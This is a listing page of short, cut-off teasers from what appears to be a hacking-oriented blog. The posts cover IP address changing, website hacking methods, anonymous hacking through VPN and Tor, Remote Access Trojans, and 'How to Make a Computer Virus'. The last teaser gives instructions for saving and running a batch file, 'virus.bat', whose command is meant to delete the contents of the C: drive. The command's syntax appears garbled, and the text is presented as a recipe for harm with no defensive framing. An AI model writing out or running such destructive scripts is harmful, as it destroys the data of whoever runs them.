How to Change Your IP Address

Every time you connect to the Internet, your ISP (Internet Service Provider) assigns an IP address to your computer that makes it possible for websites and applications to keep track of your online activities and also pin point your physical…
Top 6 Website hacking Methods

  In this article, I will list the top 6 website security issues that you should be aware of. #1. Code Injection Websites that lack some sort of form validation are prone to code injection. This occurs when a code…
Anonymous hacking using VPN and TOR

This video covers how hackers use VPN and Tor to hide their identity and test the security of websites and portals. VPN : “A virtual private network (VPN) extends a private network across a public network, such as the Internet.…
What Is RAT Or Remote Access Trojan

A Remote Administration Tool (RAT) is a piece of software that allows a remote “operator” to control a system as if he has physical access to that system. While desktop sharing and remote administration have many legal uses, “RAT” software is…
How to Make a Computer Virus

>>>Virus that format C: Drive:  1. Open Notepad and copy below code into it. @Echo off Del C: *.* |y    2. Save this file as virus.bat (Name can be anything but .bat is must)    3. Now, running this…